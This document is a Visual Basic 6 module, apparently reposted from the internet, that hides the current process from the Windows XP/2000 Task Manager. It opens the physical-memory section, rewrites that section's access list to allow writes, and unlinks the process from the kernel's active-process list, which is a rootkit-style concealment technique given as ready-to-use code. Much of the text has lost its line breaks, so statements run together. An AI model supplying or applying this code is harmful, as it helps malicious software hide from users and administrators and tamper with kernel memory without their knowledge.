说明:下面的代码来自互联网,原作者不详。用下面的代码隐藏进程后可以用IceSword来查看和结束被隐藏的进程
'-------------------------------------------------------------------------------------'模块名称:modHideProcess.bas''模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程''使用方法:直接调用 HideCurrentProcess()''模块作者:检索自互联网,原作者不详。''修改日期:2006/06/26 最后整理''阿勇 fxy_2002@163.com http://www.pc-soft.cn'---------------------------------------------------------------------------------------
Option Explicit
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004Private Const STATUS_ACCESS_DENIED = &HC0000022Private Const STATUS_INVALID_HandLE = &HC0000008Private Const ERROR_SUCCESS = 0&Private Const SECTION_MAP_WRITE = &H2Private Const SECTION_MAP_READ = &H4Private Const READ_CONTROL = &H20000Private Const WRITE_DAC = &H40000Private Const NO_INHERITANCE = 0Private Const DACL_SECURITY_INFORMATION = &H4
Private Type IO_STATUS_BLOCK Status As Long Information As LongEnd Type
Private Type UNICODE_STRING Length As Integer MaximumLength As Integer Buffer As LongEnd Type
Private Const OBJ_INHERIT = &H2Private Const OBJ_PERMANENT = &H10Private Const OBJ_EXCLUSIVE = &H20Private Const OBJ_CASE_INSENSITIVE = &H40Private Const OBJ_OPENIF = &H80Private Const OBJ_OPENLINK = &H100Private Const OBJ_KERNEL_HandLE = &H200Private Const OBJ_VALID_ATTRIBUTES = &H3F2
Private Type OBJECT_ATTRIBUTES Length As Long RootDirectory As Long ObjectName As Long Attributes As Long SecurityDeor As Long SecurityQualityOfService As LongEnd Type
Private Type ACL AclRevision As Byte Sbz1 As Byte AclSize As Integer AceCount As Integer Sbz2 As IntegerEnd Type
Private Enum ACCESS_MODE NOT_USED_ACCESS GRANT_ACCESS SET_ACCESS DENY_ACCESS REVOKE_ACCESS SET_AUDIT_SUCCESS SET_AUDIT_FAILUREEnd Enum
Private Enum MULTIPLE_TRUSTEE_OPERATION NO_MULTIPLE_TRUSTEE TRUSTEE_IS_IMPERSONATEEnd Enum
Private Enum TRUSTEE_FORM TRUSTEE_IS_SID TRUSTEE_IS_NAMEEnd Enum
Private Enum TRUSTEE_TYPE TRUSTEE_IS_UNKNOWN TRUSTEE_IS_USER TRUSTEE_IS_GROUPEnd Enum
Private Type TRUSTEE pMultipleTrustee As Long MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION TrusteeForm As TRUSTEE_FORM TrusteeType As TRUSTEE_TYPE ptstrName As StringEnd Type
Private Type EXPLICIT_ACCESS grfAccessPermissions As Long grfAccessMode As ACCESS_MODE grfInheritance As Long TRUSTEE As TRUSTEEEnd Type
Private Type AceArray List() As EXPLICIT_ACCESSEnd Type
Private Enum SE_OBJECT_TYPE SE_UNKNOWN_OBJECT_TYPE = 0 SE_FILE_OBJECT SE_SERVICE SE_PRINTER SE_REGISTRY_KEY SE_LMSHARE SE_KERNEL_OBJECT SE_WINDOW_OBJECT SE_DS_OBJECT SE_DS_OBJECT_ALL SE_PROVIDER_DEFINED_OBJECT SE_WMIGUID_OBJECTEnd Enum
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As _Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As LongPrivate Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As _Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias _"SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries _As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As LongPrivate Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias _"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal _pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As _ACCESS_MODE, ByVal Inheritance As Long) Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As _UNICODE_STRING, ByVal SourceString As Long)Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, _ByVal DesiredAccess As Long, ObjectAttributes As Any) As LongPrivate Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As LongPrivate Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As LongPrivate Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As _Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal _dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As LongPrivate Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As _LongPrivate Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination _As Any, Source As Any, ByVal Length As Long)Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128End Type Private verinfo As OSVERSIONINFO Private g_hNtDLL As LongPrivate g_pMapPhysicalMemory As LongPrivate g_hMPM As LongPrivate aByte(3) As Byte
Public Sub HideCurrentProcess()'在进程列表中隐藏当前应用程序进程
Dim thread As Long, process As Long, fw As Long, bw As Long Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long verinfo.dwOSVersionInfoSize = Len(verinfo) If (GetVersionEx(verinfo)) <> 0 Then If verinfo.dwPlatformId = 2 Then If verinfo.dwMajorVersion = 5 Then Select Case verinfo.dwMinorVersion Case 0 lOffsetFlink = &HA0 lOffsetBlink = &HA4 lOffsetPID = &H9C Case 1 lOffsetFlink = &H88 lOffsetBlink = &H8C lOffsetPID = &H84 End Select End If End If End If
If OpenPhysicalMemory <> 0 Then thread = GetData(&HFFDFF124) process = GetData(thread + &H44) fw = GetData(process + lOffsetFlink) bw = GetData(process + lOffsetBlink) SetData fw + 4, bw SetData bw, fw CloseHandle g_hMPM End IfEnd Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long) Dim pDacl As Long Dim pNewDacl As Long Dim pSD As Long Dim dwRes As Long Dim ea As EXPLICIT_ACCESS GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD ea.grfAccessPermissions = SECTION_MAP_WRITE ea.grfAccessMode = GRANT_ACCESS ea.grfInheritance = NO_INHERITANCE ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
SetEntriesInAcl 1, ea, pDacl, pNewDacl SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0 CleanUp: LocalFree pSD LocalFree pNewDaclEnd Sub
Private Function OpenPhysicalMemory() As Long Dim Status As Long Dim PhysmemString As UNICODE_STRING Dim Attributes As OBJECT_ATTRIBUTES RtlInitUnicodeString PhysmemString, StrPtr("/Device/PhysicalMemory") Attributes.Length = Len(Attributes) Attributes.RootDirectory = 0 Attributes.ObjectName = VarPtr(PhysmemString) Attributes.Attributes = 0 Attributes.SecurityDeor = 0 Attributes.SecurityQualityOfService = 0 Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes) If Status = STATUS_ACCESS_DENIED Then Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes) SetPhyscialMemorySectionCanBeWrited g_hMPM CloseHandle g_hMPM Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes) End If Dim lDirectoty As Long verinfo.dwOSVersionInfoSize = Len(verinfo) If (GetVersionEx(verinfo)) <> 0 Then If verinfo.dwPlatformId = 2 Then If verinfo.dwMajorVersion = 5 Then Select Case verinfo.dwMinorVersion Case 0 lDirectoty = &H30000 Case 1 lDirectoty = &H39000 End Select End If End If End If If Status = 0 Then g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000) If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM End IfEnd Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long Dim lTemp As Long VAddr = addr CopyMemory aByte(0), VAddr, 4 lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22)) PGDE = BaseAddress + lTemp * 4 CopyMemory PGDE, ByVal PGDE, 4 If (PGDE And 1) <> 0 Then lTemp = PGDE And &H80 If lTemp <> 0 Then PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF) Else PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000) lTemp = (VAddr And &H3FF000) / (2 ^ 12) PTE = PGDE + lTemp * 4 CopyMemory PTE, ByVal PTE, 4 If (PTE And 1) <> 0 Then PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF) UnmapViewOfFile PGDE End If End If End If LinearToPhys = PAddrEnd Function
Private Function GetData(addr As Long) As Long Dim phys As Long, tmp As Long, ret As Long phys = LinearToPhys(g_pMapPhysicalMemory, addr) tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000) If tmp <> 0 Then ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4 CopyMemory ret, ByVal ret, 4 UnmapViewOfFile tmp GetData = ret End IfEnd Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean Dim phys As Long, tmp As Long, x As Long phys = LinearToPhys(g_pMapPhysicalMemory, addr) tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000) If tmp <> 0 Then x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4 CopyMemory ByVal x, data, 4 UnmapViewOfFile tmp SetData = True End IfEnd Function
Private Function ByteArrToLong(inByte() As Byte) As Double Dim i As Integer For i = 0 To 3 ByteArrToLong = ByteArrToLong + inByte(i) * (&H100 ^ i) Next iEnd Function
